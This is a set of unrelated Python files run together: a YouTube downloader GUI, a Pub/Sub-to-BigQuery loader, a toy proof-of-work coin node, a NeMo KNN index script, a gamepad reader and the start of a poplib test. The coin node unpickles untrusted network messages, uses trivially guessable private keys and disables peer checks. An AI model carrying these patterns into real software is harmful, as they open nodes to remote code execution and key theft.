file=dir_path + "/Assets/Images/percent.gif",
format="gif -index %i" % (i),
)
for i in range(101)
]
W_download = tk.Toplevel(height=300, width=300)
video = YouTube(url, on_progress_callback=progress_function)
W_download.title("Downloading " + video.title)
downloading_message = (
"The video : "
+ video.title
+ " is being downloaded, and will appear in your default downloads directory"
)
Message(W_download, text=downloading_message).pack()
L_gif = Label(W_download, image=frames[0])
L_gif.pack()
if Selected_Option == "Select Quality":
video.streams.first().download()
print("Default video downloaded.")
else:
selectedOptionList = Selected_Option.split()
selectedItag = selectedOptionList[-1]
selectedStream = video.streams.get_by_itag(selectedItag)
selectedStream.download()
print("Selected video downloaded.")
W_download.destroy()
os.chdir(dir_path)
L_gif.configure(image=frames[100])
url = E_url.get()
Selected_Option = selectedOption.get()
t_downloading = threading.Thread(target=downloading, args=(url, Selected_Option))
t_downloading.start()
def Set_proxy_window():
W_proxy = tk.Toplevel()
W_proxy.title("Proxy Set-up")
# variables
v_http = StringVar(W_proxy)
v_https = StringVar(W_proxy)
# Entries
E_http = Entry(W_proxy, textvariable=v_http)
E_https = Entry(W_proxy, textvariable=v_https)
def Set_Proxy():
print("Setting Proxy")
if E_http.get() != "" and E_https.get() != "":
my_proxy["http"] = "http://" + E_http.get()
my_proxy["https"] = "https://" + E_https.get()
os.environ["NO_PROXY"] = ""
print(my_proxy["https"])
elif E_http.get() != "":
my_proxy["http"] = "http://" + E_http.get()
os.environ["NO_PROXY"] = "https://*"
elif E_https.get() != "":
my_proxy["https"] = "https://" + E_https.get()
os.environ["NO_PROXY"] = "http://*"
else:
os.environ["NO_PROXY"] = "*"
os.environ["HTTP_PROXY"] = my_proxy["http"]
os.environ["HTTPS_PROXY"] = my_proxy["https"]
W_proxy.destroy()
# Buttons
B_okay = Button(W_proxy, text="Okay", command=Set_Proxy)
B_cancel = Button(W_proxy, text="Cancel", command=W_proxy.destroy)
# Placing
Label(W_proxy, text="http :").place(x=15, y=15)
E_http.place(x=65, y=15)
Label(W_proxy, text="https :").place(x=15, y=40)
E_https.place(x=65, y=40)
B_okay.place(x=20, y=70)
B_cancel.place(x=155, y=70)
# setting proxy window size and position
W_proxy.geometry("250x110+300+300")
def func(event):
pathe = os.path.expanduser("~") + "/Downloads"
os.chdir(pathe)
url = E_url.get()
video = YouTube(url)
stream = video.streams.first()
print(os.getcwd())
stream.download()
root.bind("<Return>", func)
# Buttons
B_refresh = Button(root, text="Refresh", command=onok)
B_setproxy = Button(root, text="Set Proxy", command=Set_proxy_window)
B_download = Button(root, text="Download", command=ondown)
B_exit = Button(root, text="CLOSE", fg="red", command=root.destroy)
# Placing
Label(text="Link :").place(x=20, y=20)
E_url.place(y=20, x=60, width=400)
videoTitle.place(x=15, y=50, width=450)
qualityOptionsMenu.place(x=25, y=75, width=220)
B_setproxy.place(x=45, y=110)
B_download.place(x=135, y=110)
B_exit.place(x=100, y=145)
B_refresh.place(y=170, x=320)
L_image.place(x=300, y=75, height=90, width=120)
# setting root window size and position
root.geometry("475x205+300+300")
root.mainloop()
|
pubsub2bq.py
|
#!/usr/bin/env python
import argparse
import json
from datetime import datetime
import threading, queue
import os
def pubsub2bq(
project_id, subscription_id, dataset_id, table_id, timeout=None
):
"""Receives messages from a pull subscription with flow control."""
# [START pubsub_subscriber_flow_settings]
from google.cloud import pubsub_v1
from google.cloud import bigquery
# queue
q = queue.Queue()
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
# Number of seconds the subscriber should listen for messages
# timeout = 5.0
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(
project_id, subscription_id
)
def callback(message):
print("Received message: {}".format(message.data))
jsonmsg = json.loads(message.data)
jsonmsg['timestamp'] = datetime.utcfromtimestamp(jsonmsg['timestamp']).isoformat()
print('json: {}'.format(jsonmsg))
q.put(jsonmsg)
message.ack()
# bigquery client
client = bigquery.Client(project=project_id)
dataset_ref = client.dataset(dataset_id)
table_ref = dataset_ref.table(table_id)
def worker_bq():
print('Running worker_bq')
t = threading.currentThread()
while getattr(t, 'do_run', True):
jsonmsg = q.get()
print('bq load')
try:
job = client.load_table_from_json([jsonmsg], table_ref)
job.result()
except:
os._exit(1)
print('Finish worker_bq')
# Limit the subscriber to only have ten outstanding messages at a time.
flow_control = pubsub_v1.types.FlowControl(max_messages=10)
streaming_pull_future = subscriber.subscribe(
subscription_path, callback=callback, flow_control=flow_control
)
print("Listening for messages on {}..".format(subscription_path))
print("Insert messages to {}..\n".format(table_ref.path))
# start worker_bq thread
t = threading.Thread(target=worker_bq, name='worker_bq')
t.start()
print('Start subscriber')
# Wrap subscriber in a 'with' block to automatically call close() when done.
with subscriber:
try:
# When `timeout` is not set, result() will block indefinitely,
# unless an exception is encountered first.
streaming_pull_future.result(timeout=timeout)
except TimeoutError:
streaming_pull_future.cancel()
setattr(t, 'do_run', False)
t.join()
# [END pubsub_subscriber_flow_settings]
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("project_id", help="Google Cloud project ID")
parser.add_argument("subscription_id", help="PubSub subscription ID")
parser.add_argument("dataset_id", help="BigQuery dataset ID")
parser.add_argument("table_id", help="BigQuery table ID")
args = parser.parse_args()
pubsub2bq(args.project_id, args.subscription_id, args.dataset_id, args.table_id)
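# A usage sketch (all four arguments are placeholders for your own GCP resources):
#
#   python pubsub2bq.py my-project my-subscription my_dataset my_table
#
# The Pub/Sub callback parses each message as JSON, converts the epoch `timestamp` field to an
# ISO string, and hands the row to the worker thread, which streams it into the BigQuery table
# via load_table_from_json.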
|
powp2pcoin_three.py
|
"""
POW Syndacoin
Usage:
  pow_syndacoin.py serve
  pow_syndacoin.py ping [--node <node>]
  pow_syndacoin.py tx <from> <to> <amount> [--node <node>]
  pow_syndacoin.py balance <name> [--node <node>]
Options:
-h --help Show this screen.
--node=<node> Hostname of node [default: node0]
"""
import uuid, socketserver, socket, sys, argparse, time, os, logging, threading, hashlib, random, re, pickle
from docopt import docopt
from copy import deepcopy
from ecdsa import SigningKey, SECP256k1
PORT = 10000
GET_BLOCKS_CHUNK = 10
BLOCK_SUBSIDY = 50
node = None
logging.basicConfig(level="INFO", format='%(threadName)-6s | %(message)s')
logger = logging.getLogger(__name__)
def spend_message(tx, index):
outpoint = tx.tx_ins[index].outpoint
return serialize(outpoint) + serialize(tx.tx_outs)
class Tx:
def __init__(self, id, tx_ins, tx_outs):
self.id = id
self.tx_ins = tx_ins
self.tx_outs = tx_outs
def sign_input(self, index, private_key):
message = spend_message(self, index)
signature = private_key.sign(message)
self.tx_ins[index].signature = signature
def verify_input(self, index, public_key):
tx_in = self.tx_ins[index]
message = spend_message(self, index)
return public_key.verify(tx_in.signature, message)
@property
def is_coinbase(self):
return self.tx_ins[0].tx_id is None
def __eq__(self, other):
return self.id == other.id
class TxIn:
def __init__(self, tx_id, index, signature=None):
self.tx_id = tx_id
self.index = index
self.signature = signature
@property
def outpoint(self):
return (self.tx_id, self.index)
class TxOut:
def __init__(self, tx_id, index, amount, public_key):
self.tx_id = tx_id
self.index = index
self.amount = amount
self.public_key = public_key
@property
def outpoint(self):
return (self.tx_id, self.index)
class Block:
def __init__(self, txns, prev_id, nonce):
self.txns = txns
self.prev_id = prev_id
self.nonce = nonce
@property
def header(self):
return serialize(self)
@property
def id(self):
return hashlib.sha256(self.header).hexdigest()
@property
def proof(self):
return int(self.id, 16)
def __repr__(self):
return f"Block(prev_id={self.prev_id[:10]}... id={self.id[:10]}...)"
class Node:
def __init__(self, address):
self.blocks = []
self.utxo_set = {}
self.mempool = []
self.peers = []
self.pending_peers = []
self.address = address
def connect(self, peer):
if peer not in self.peers and peer != self.address:
logger.info(f'(handshake) Sent "connect" to {peer[0]}')
try:
send_message(peer, "connect", None)
self.pending_peers.append(peer)
except:
logger.info(f'(handshake) Node {peer[0]} offline')
def sync(self):
blocks = self.blocks[-GET_BLOCKS_CHUNK:]
block_ids = [block.id for block in blocks]
for peer in self.peers:
send_message(peer, "sync", block_ids)
def fetch_utxos(self, public_key):
return [tx_out for tx_out in self.utxo_set.values()
if tx_out.public_key == public_key]
def update_utxo_set(self, tx):
# Remove utxos that were just spent
if not tx.is_coinbase:
for tx_in in tx.tx_ins:
del self.utxo_set[tx_in.outpoint]
# Save utxos which were just created
for tx_out in tx.tx_outs:
self.utxo_set[tx_out.outpoint] = tx_out
# Clean up mempool
if tx in self.mempool:
self.mempool.remove(tx)
def fetch_balance(self, public_key):
# Fetch utxos associated with this public key
utxos = self.fetch_utxos(public_key)
# Sum the amounts
return sum([tx_out.amount for tx_out in utxos])
def validate_tx(self, tx):
in_sum = 0
out_sum = 0
for index, tx_in in enumerate(tx.tx_ins):
# TxIn spending an unspent output
assert tx_in.outpoint in self.utxo_set
# Grab the tx_out
tx_out = self.utxo_set[tx_in.outpoint]
# Verify signature using public key of TxOut we're spending
public_key = tx_out.public_key
tx.verify_input(index, public_key)
# Sum up the total inputs
amount = tx_out.amount
in_sum += amount
for tx_out in tx.tx_outs:
            # Sum up the total outputs
out_sum += tx_out.amount
# Check no value created or destroyed
assert in_sum == out_sum
def validate_coinbase(self, tx):
assert len(tx.tx_ins) == len(tx.tx_outs) == 1
assert tx.tx_outs[0].amount == BLOCK_SUBSIDY
def handle_tx(self, tx):
if tx not in self.mempool:
self.validate_tx(tx)
self.mempool.append(tx)
            # Propagate transaction
for peer in self.peers:
send_message(peer, "tx", tx)
def validate_block(self, block):
assert block.proof < POW_TARGET, "Insufficient Proof-of-Work"
assert block.prev_id == self.blocks[-1].id
def handle_block(self, block):
# Check work, chain ordering
self.validate_block(block)
# Validate coinbase separately
self.validate_coinbase(block.txns[0])
# Check the transactions are valid
for tx in block.txns[1:]:
self.validate_tx(tx)
# If they're all good, update self.blocks and self.utxo_set
for tx in block.txns:
self.update_utxo_set(tx)
# Add the block to our chain
self.blocks.append(block)
logger.info(f"Block accepted: height={len(self.blocks) - 1}")
        # Block propagation
for peer in self.peers:
send_message(peer, "blocks", [block])
def prepare_simple_tx(utxos, sender_private_key, recipient_public_key, amount):
sender_public_key = sender_private_key.get_verifying_key()
# Construct tx.tx_outs
tx_ins = []
tx_in_sum = 0
for tx_out in utxos:
tx_ins.append(TxIn(tx_id=tx_out.tx_id, index=tx_out.index, signature=None))
tx_in_sum += tx_out.amount
if tx_in_sum > amount:
break
# Make sure sender can afford it
assert tx_in_sum >= amount
# Construct tx.tx_outs
tx_id = uuid.uuid4()
change = tx_in_sum - amount
tx_outs = [
TxOut(tx_id=tx_id, index=0, amount=amount, public_key=recipient_public_key),
TxOut(tx_id=tx_id, index=1, amount=change, public_key=sender_public_key),
]
# Construct tx and sign inputs
tx = Tx(id=tx_id, tx_ins=tx_ins, tx_outs=tx_outs)
for i in range(len(tx.tx_ins)):
tx.sign_input(i, sender_private_key)
return tx
def prepare_coinbase(public_key, tx_id=None):
if tx_id is None:
tx_id = uuid.uuid4()
return Tx(
id=tx_id,
tx_ins=[
TxIn(None, None, None),
],
tx_outs=[
TxOut(tx_id=tx_id, index=0, amount=BLOCK_SUBSIDY,
public_key=public_key),
],
)
##########
# Mining #
##########
DIFFICULTY_BITS = 15
POW_TARGET = 2 ** (256 - DIFFICULTY_BITS)
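# With DIFFICULTY_BITS = 15 the target admits 2**(256 - 15) of the 2**256 possible hashes, so each
# nonce succeeds with probability 2**-15 and mining a block takes roughly 32768 attempts on average.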
mining_interrupt = threading.Event()
def mine_block(block):
while block.proof >= POW_TARGET:
# TODO: accept interrupts here if tip changes
if mining_interrupt.is_set():
logger.info("Mining interrupted")
mining_interrupt.clear()
return
block.nonce += 1
return block
def mine_forever(public_key):
logging.info("Starting miner")
while True:
coinbase = prepare_coinbase(public_key)
unmined_block = Block(
txns=[coinbase] + node.mempool,
prev_id=node.blocks[-1].id,
nonce=random.randint(0, 1000000000),
)
mined_block = mine_block(unmined_block)
if mined_block:
logger.info("")
logger.info("Mined a block")
node.handle_block(mined_block)
def mine_genesis_block(public_key):
global node
coinbase = prepare_coinbase(public_key, tx_id="abc123")
unmined_block = Block(txns=[coinbase], prev_id=None, nonce=0)
mined_block = mine_block(unmined_block)
node.blocks.append(mined_block)
node.update_utxo_set(coinbase)
##############
# Networking #
##############
def serialize(coin):
return pickle.dumps(coin)
def deserialize(serialized):
return pickle.loads(serialized)
def read_message(s):
message = b''
# Our protocol is: first 4 bytes signify message length
raw_message_length = s.recv(4) or b"\x00"
message_length = int.from_bytes(raw_message_length, 'big')
while message_length > 0:
chunk = s.recv(1024)
message += chunk
message_length -= len(chunk)
return deserialize(message)
def prepare_message(command, data):
message = {
"command": command,
"data": data,
}
serialized_message = serialize(message)
length = len(serialized_message).to_bytes(4, 'big')
return length + serialized_message
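# Wire format: every message is a 4-byte big-endian length prefix followed by the pickled
# {"command": ..., "data": ...} dict; read_message() above consumes the prefix first and then
# keeps calling recv() until that many payload bytes have arrived.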
class TCPHandler(socketserver.BaseRequestHandler):
def get_canonical_peer_address(self):
ip = self.client_address[0]
try:
hostname = socket.gethostbyaddr(ip)
hostname = re.search(r"_(.*?)_", hostname[0]).group(1)
except:
hostname = ip
return (hostname, PORT)
def respond(self, command, data):
response = prepare_message(command, data)
return self.request.sendall(response)
def handle(self):
message = read_message(self.request)
command = message["command"]
data = message["data"]
peer = self.get_canonical_peer_address()
# Handshake / Authentication
if command == "connect":
if peer not in node.pending_peers and peer not in node.peers:
node.pending_peers.append(peer)
logger.info(f'(handshake) Accepted "connect" request from "{peer[0]}"')
send_message(peer, "connect-response", None)
elif command == "connect-response":
if peer in node.pending_peers and peer not in node.peers:
node.pending_peers.remove(peer)
node.peers.append(peer)
logger.info(f'(handshake) Connected to "{peer[0]}"')
send_message(peer, "connect-response", None)
# Request their peers
send_message(peer, "peers", None)
# else:
# assert peer in node.peers, \
# f"Rejecting {command} from unconnected {peer[0]}"
# Business Logic
if command == "peers":
send_message(peer, "peers-response", node.peers)
if command == "peers-response":
for peer in data:
node.connect(peer)
if command == "ping":
self.respond(command="pong", data="")
if command == "sync":
            # Find our most recent blocks the peer doesn't know about,
            # but which build off a block they do know about.
peer_block_ids = data
for block in node.blocks[::-1]:
if block.id not in peer_block_ids \
and block.prev_id in peer_block_ids:
height = node.blocks.index(block)
blocks = node.blocks[height:height+GET_BLOCKS_CHUNK]
send_message(peer, "blocks", blocks)
logger.info('Served "sync" request')
return
logger.info('Could not serve "sync" request')
if command == "blocks":
for block in data:
try:
node.handle_block(block)
mining_interrupt.set()
except:
logger.info("Rejected block")
if len(data) == GET_BLOCKS_CHUNK:
node.sync()
if command == "tx":
node.handle_tx(data)
if command == "balance":
balance = node.fetch_balance(data)
self.respond(command="balance-response", data=balance)
if command == "utxos":
utxos = node.fetch_utxos(data)
self.respond(command="utxos-response", data=utxos)
def external_address(node):
i = int(node[-1])
port = PORT + i
return ('localhost', port)
def serve():
logger.info("Starting server")
server = socketserver.TCPServer(("0.0.0.0", PORT), TCPHandler)
server.serve_forever()
def send_message(address, command, data, response=False):
message = prepare_message(command, data)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(address)
s.sendall(message)
if response:
return read_message(s)
#######
# CLI #
#######
def lookup_private_key(name):
exponent = {
"alice": 1, "bob": 2, "node0": 3, "node1": 4, "node2": 5
}[name]
return SigningKey.from_secret_exponent(exponent, curve=SECP256k1)
def lookup_public_key(name):
return lookup_private_key(name).get_verifying_key()
def main(args):
if args["serve"]:
threading.current_thread().name = "main"
name = os.environ["NAME"]
duration = 10 * ["node0", "node1", "node2"].index(name)
time.sleep(duration)
global node
node = Node(address=(name, PORT))
# Alice is Satoshi!
mine_genesis_block(lookup_public_key("alice"))
# Start server thread
server_thread = threading.Thread(target=serve, name="server")
server_thread.start()
# Join the network
peers = [(p, PORT) for p in os.environ['PEERS'].split(',')]
for peer in peers:
node.connect(peer)
# Wait for peer connections
time.sleep(1)
# Do initial block download
node.sync()
# Wait for IBD to finish
time.sleep(1)
# Start miner thread
miner_public_key = lookup_public_key(name)
miner_thread = threading.Thread(target=mine_forever,
args=[miner_public_key], name="miner")
miner_thread.start()
elif args["ping"]:
address = external_address(args["--node"])
send_message(address, "ping", "")
elif args["balance"]:
public_key = lookup_public_key(args["<name>"])
address = external_address(args["--node"])
response = send_message(address, "balance", public_key, response=True)
print(response["data"])
elif args["tx"]:
# Grab parameters
sender_private_key = lookup_private_key(args["<from>"])
sender_public_key = sender_private_key.get_verifying_key()
recipient_private_key = lookup_private_key(args["<to>"])
recipient_public_key = recipient_private_key.get_verifying_key()
amount = int(args["<amount>"])
address = external_address(args["--node"])
# Fetch utxos available to spend
response = send_message(address, "utxos", sender_public_key, response=True)
utxos = response["data"]
# Prepare transaction
tx = prepare_simple_tx(utxos, sender_private_key, recipient_public_key, amount)
# send to node
send_message(address, "tx", tx)
else:
print("Invalid command")
if __name__ == '__main__':
main(docopt(__doc__))
|
build_knn_map_index.py
|
# Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is the script to build the KNN index map from the training dataset to the retrieval dataset.
For example, it maps chunk_id i from the training dataset to the K nearest-neighbor chunk ids in the retrieval dataset.
It requires the training text data to be converted into `bin` and `idx` files by `preprocess_data_for_megatron.py` script.
It also requires the Faiss Index file for the Retrieval dataset built by `build_retrieval_index.py` script.
Here is an example of using it:
```python
python scripts/nlp_language_modeling/build_knn_map_index.py \
--input_file=PATH_TO_INPUT_TRAINING_DATA \
--tokenizer-library=sentencepiece \
--tokenizer-model=tokenizer.model \
--process_chunk_size=51200 \
--K_neighbors=16 \
--faiss_index=PATH_TO_FAISS_INDEX_FILE \
--devices=0,1,2,3 \
--batch_size=1280 \
--remove_duplicate \
--output_file=knn_map.idx
```
Use the `--remove_duplicate` flag if the training data and the retrieval dataset are the same. It removes neighbors that come from the same document.
It creates a knn_map.idx KNNIndex file.
During training of the RETRO model, it can be used to look up the KNN chunk ids in the
DB dataset given an input training data chunk id.
"""
import argparse
import multiprocessing
import faiss
import numpy as np
from numba import njit, prange
from sentence_transformers import SentenceTransformer
from nemo.collections.nlp.data.language_modeling.megatron.indexed_retrieval_dataset import (
KNNIndex,
MMapRetrievalIndexedDataset,
)
from nemo.collections.nlp.modules.common.tokenizer_utils import get_nmt_tokenizer
from nemo.utils import logging
QUEUE_SIZE = 30
queue = multiprocessing.Queue(QUEUE_SIZE)
emb_queue = multiprocessing.Queue(QUEUE_SIZE)
@njit(parallel=True)
def build_map(chunk_start, result, total_chunks):
"""
build the map from chunk_id to document id
"""
size = len(chunk_start)
for i in prange(size):
beg = chunk_start[i]
end = chunk_start[i + 1] if i < size - 1 else total_chunks
result[beg:end] = i
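# Worked example: with chunk_start = [0, 3, 5] and total_chunks = 7, chunks 0-2 map to document 0,
# chunks 3-4 to document 1 and chunks 5-6 to document 2, i.e. result == [0, 0, 0, 1, 1, 2, 2].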
@njit(parallel=True)
def dedup(chunk_id_to_doc_id_map, I, tmp_neighbors, chunk_id_start):
"""
deduplicate the KNN who are from the same document as the data chunks.
chunk_id_to_doc_id_map is calculated by build_map function.
I is original KNN search result from Faiss.
chunk_id_start is the chunk_id offset.
filtered KNN will be stored in the tmp_neighbors
"""
for cid in prange(len(I)):
source_doc_id = chunk_id_to_doc_id_map[chunk_id_start + cid]
position = 0
for target_chunk_id in I[cid]:
if chunk_id_start + cid == target_chunk_id:
continue
target_doc_id = chunk_id_to_doc_id_map[target_chunk_id]
if source_doc_id != target_doc_id:
tmp_neighbors[cid, position] = target_chunk_id
position += 1
def get_tokenizer(args):
tokenizer = get_nmt_tokenizer(
library=args.tokenizer_library,
model_name=args.tokenizer_type,
tokenizer_model=args.tokenizer_model,
vocab_file=args.vocab_file,
merges_file=args.merge_file,
delimiter=args.delimiter,
)
if not hasattr(tokenizer, "pad_id"):
tokenizer.add_special_tokens({'pad_token': '<pad>'})
elif hasattr(tokenizer, "pad_id") and (tokenizer.pad_id is None or tokenizer.pad_id < 0):
tokenizer.add_special_tokens({'pad_token': '<pad>'})
return tokenizer
def process_sentence_chunks(ds: MMapRetrievalIndexedDataset, tokenizer, chunk_size: int):
total_chunks = ds.chunks
start = 0
threshold = 0
while start < total_chunks:
if start / total_chunks > threshold:
logging.info(f"sentence processing {start / total_chunks} is done")
threshold += 0.1
id_slices = ds.get_chunk(slice(start, min(start + chunk_size, total_chunks)), force_no_cont_ids=True)
start = min(start + chunk_size, total_chunks)
sentences = [tokenizer.ids_to_text(ids) for ids in id_slices]
queue.put(sentences)
queue.put(None)
def get_sentence_chunks():
return queue.get()
def calculate_embedding(pool, batch_size):
while True:
sentences = get_sentence_chunks()
if sentences is None:
break
emb = model.encode_multi_process(sentences=sentences, pool=pool, batch_size=batch_size)
emb_queue.put(emb)
emb_queue.put(None)
def get_emb():
return emb_queue.get()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="build Faiss index",)
parser.add_argument(
'--input_file', type=str, required=True, help='Input file',
)
parser.add_argument("--faiss_index", type=str, required=True, help='faiss index file for retrieval dataset')
parser.add_argument(
'--process_chunk_size',
type=int,
default=10000,
        help='The number of sentences per chunk that are used as queries to build the map index',
)
parser.add_argument(
'--remove_duplicate',
action='store_true',
        help='Remove the KNN neighbors that are from the same document as the data.',
)
parser.add_argument(
'--K_neighbors', type=int, default=16, help='The number of neighbors to query',
)
parser.add_argument(
'--dedup_margin',
type=int,
default=2,
        help='extra neighbors to fetch so that slots removed during deduplication can be backfilled',
)
parser.add_argument(
'--sentence_transformer_model',
type=str,
default='bert-base-nli-mean-tokens',
help='sentence transformer to load',
)
parser.add_argument(
'--output_file', type=str, required=True, help='Output KNN Map index file',
)
parser.add_argument(
'--devices', type=str, default=None, help='delimited list input with cuda devices. Specify like 0,1,2'
)
parser.add_argument(
"--batch_size", type=int, default=4000, help="Batch size for encoding. Use max according to GPU MEM"
)
group = parser.add_argument_group(title='tokenizer')
group.add_argument(
'--tokenizer-library',
type=str,
required=True,
choices=['yttm', 'sentencepiece', 'megatron', 'huggingface', 'tabular'],
help='What tokenizer library to use.',
)
group.add_argument(
'--tokenizer-type', type=str, default=None, help='What type of tokenizer to use.',
)
group.add_argument(
'--tokenizer-model', type=str, default=None, help='Path to tokenizer model.',
)
group.add_argument('--vocab-file', type=str, default=None, help='Path to the vocab file')
group.add_argument('--merge-file', type=str, default=None, help='Path to the BPE merge file (if necessary).')
group.add_argument('--delimiter', type=str, default=None, help='delimiter used for tabular tokenizer')
args = parser.parse_args()
model = SentenceTransformer(args.sentence_transformer_model)
tokenizer = get_tokenizer(args)
ds = MMapRetrievalIndexedDataset(args.input_file)
index = faiss.read_index(args.faiss_index)
process = multiprocessing.Process(target=process_sentence_chunks, args=(ds, tokenizer, args.process_chunk_size))
process.start()
if args.devices is None:
device_list = None
else:
device_list = ['cuda:' + str(device) for device in args.devices.split(',')]
pool = model.start_multi_process_pool(device_list)
emb_process = multiprocessing.Process(target=calculate_embedding, args=(pool, args.batch_size))
emb_process.start()
if ds._index.retrieval_db and args.remove_duplicate:
neighbors = args.K_neighbors + args.dedup_margin
# build the id maps for quick dedup
id_start = np.array(ds._index._chunk_id_start)
chunk_id_to_doc_id_map = np.zeros((ds.chunks,), dtype=np.int64)
build_map(id_start, chunk_id_to_doc_id_map, ds.chunks)
else:
neighbors = args.K_neighbors
chunk_id_start = 0
with KNNIndex.writer(args.output_file, args.K_neighbors) as w:
while True:
emb = get_emb()
if emb is None:
break
D, I = index.search(emb, neighbors)
if ds._index.retrieval_db and args.remove_duplicate:
tmp_neighbors = np.ones_like(I) * -1
dedup(chunk_id_to_doc_id_map, I, tmp_neighbors, chunk_id_start)
I = tmp_neighbors[:, : args.K_neighbors]
chunk_id_start += len(I)
w.write(I)
process.join()
emb_process.join()
model.stop_multi_process_pool(pool)
|
gamepad_reader.py
|
from absl import app
from absl import flags
from inputs import get_gamepad
import threading
import time
FLAGS = flags.FLAGS
MAX_ABS_RX = 32768
MAX_ABS_RY = 32768
def _interpolate(raw_reading, max_raw_reading, new_scale):
return raw_reading / max_raw_reading * new_scale
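# Example: a half-deflected stick reading of 16384 out of MAX_ABS_RX (32768) with new_scale=0.4
# maps to 16384 / 32768 * 0.4 = 0.2.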
class Gamepad:
"""Interface for reading commands from Logitech F710 Gamepad.
The control works as following:
1) Press LB+RB at any time for emergency stop
2) Use the left joystick for forward/backward/left/right walking.
3) Use the right joystick for rotation around the z-axis.
"""
def __init__(self, vel_scale_x=.4, vel_scale_y=.4, vel_scale_rot=1.):
"""Initialize the gamepad controller.
Args:
vel_scale_x: maximum absolute x-velocity command.
vel_scale_y: maximum absolute y-velocity command.
vel_scale_rot: maximum absolute yaw-dot command.
"""
self._vel_scale_x = vel_scale_x
self._vel_scale_y = vel_scale_y
self._vel_scale_rot = vel_scale_rot
self._lb_pressed = False
self._rb_pressed = False
# Controller states
self.vx, self.vy, self.wz = 0., 0., 0.
self.estop_flagged = False
self.is_running = True
self.read_thread = threading.Thread(target=self.read_loop)
self.read_thread.start()
def read_loop(self):
"""The read loop for events.
    This function should be executed in a separate thread for continuous
event recording.
"""
while self.is_running and not self.estop_flagged:
events = get_gamepad()
for event in events:
self.update_command(event)
def update_command(self, event):
"""Update command based on event readings."""
if event.ev_type == 'Key' and event.code == 'BTN_TL':
self._lb_pressed = bool(event.state)
elif event.ev_type == 'Key' and event.code == 'BTN_TR':
self._rb_pressed = bool(event.state)
elif event.ev_type == 'Absolute' and event.code == 'ABS_X':
# Left Joystick L/R axis
self.vy = _interpolate(-event.state, MAX_ABS_RX, self._vel_scale_y)
elif event.ev_type == 'Absolute' and event.code == 'ABS_Y':
# Left Joystick F/B axis; need to flip sign for consistency
self.vx = _interpolate(-event.state, MAX_ABS_RY, self._vel_scale_x)
elif event.ev_type == 'Absolute' and event.code == 'ABS_RX':
self.wz = _interpolate(-event.state, MAX_ABS_RX, self._vel_scale_rot)
if self._lb_pressed and self._rb_pressed:
self.estop_flagged = True
self.vx, self.vy, self.wz = 0., 0., 0.
def get_command(self, time_since_reset):
del time_since_reset # unused
return (self.vx, self.vy, 0), self.wz, self.estop_flagged
def stop(self):
self.is_running = False
def main(_):
gamepad = Gamepad()
while True:
print("Vx: {}, Vy: {}, Wz: {}, Estop: {}".format(gamepad.vx, gamepad.vy,
gamepad.wz,
gamepad.estop_flagged))
time.sleep(0.1)
if __name__ == "__main__":
app.run(main)
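# --- Illustrative sketch (editorial addition, not part of the original module) ---
# One way a robot control loop might consume Gamepad.get_command(); the
# `apply_velocity_command` callback is hypothetical and stands in for whatever
# sends velocity commands to the robot.
def run_teleop_loop(apply_velocity_command, control_dt=0.02):
  """Polls the gamepad and forwards (vx, vy, vz), wz until e-stop is flagged."""
  gamepad = Gamepad()
  try:
    while True:
      lin_vel, yaw_rate, estop = gamepad.get_command(time_since_reset=0.0)
      if estop:
        break
      apply_velocity_command(lin_vel, yaw_rate)
      time.sleep(control_dt)
  finally:
    gamepad.stop()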
|
test_poplib.py
|
"""Test script for poplib module."""
# Modified by Giampaolo Rodola' to give poplib.POP3 and poplib.POP3_SSL
# a real test suite
import poplib
import asyncore
import asynchat
import socket
import os
import time
import errno
from unittest import TestCase
from test import support as test_support
threading = test_support.import_module('threading')
HOST = test_support.HOST
PORT = 0
# the dummy data returned by server when LIST and RETR commands are issued
LIST_RESP = b'1 1\r\n2 2\r\n3 3\r\n4 4\r\n5 5\r\n.\r\n'
RETR_RESP = b"""From: postmaster@python.org\
\r\nContent-Type: text/plain\r\n\
MIME-Version: 1.0\r\n\
Subject: Dummy\r\n\
\r\n\
line1\r\n\
line2\r\n\
line3\r\n\
.\r\n"""
class DummyPOP3Handler(asynchat.async_chat):
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.push('+OK dummy pop3 server ready. <timestamp>')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer)
line = str(line, 'ISO-8859-1')
self.in_buffer = []
cmd = line.split(' ')[0].lower()
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('-ERR unrecognized POP3 command "%s".' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data.encode("ISO-8859-1") + b'\r\n')
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
if arg != "guido":
self.push("-ERR no such user")
self.push('+OK password required')
def cmd_pass(self, arg):
if arg != "python":
self.push("-ERR wrong password")
self.push('+OK 10 messages')
def cmd_stat(self, arg):
self.push('+OK 10 100')
def cmd_list(self, arg):
if arg:
self.push('+OK %s %s' %(arg, arg))
else:
self.push('+OK')
asynchat.async_chat.push(self, LIST_RESP)
cmd_uidl = cmd_list
def cmd_retr(self, arg):
self.push('+OK %s bytes' %len(RETR_RESP))
asynchat.async_chat.push(self, RETR_RESP)
cmd_top = cmd_retr
def cmd_dele(self, arg):
self.push('+OK message marked for deletion.')
def cmd_noop(self, arg):
self.push('+OK done nothing.')
def cmd_rpop(self, arg):
self.push('+OK done nothing.')
def cmd_apop(self, arg):
self.push('+OK done nothing.')
class DummyPOP3Server(asyncore.dispatcher, threading.Thread):
handler = DummyPOP3Handler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
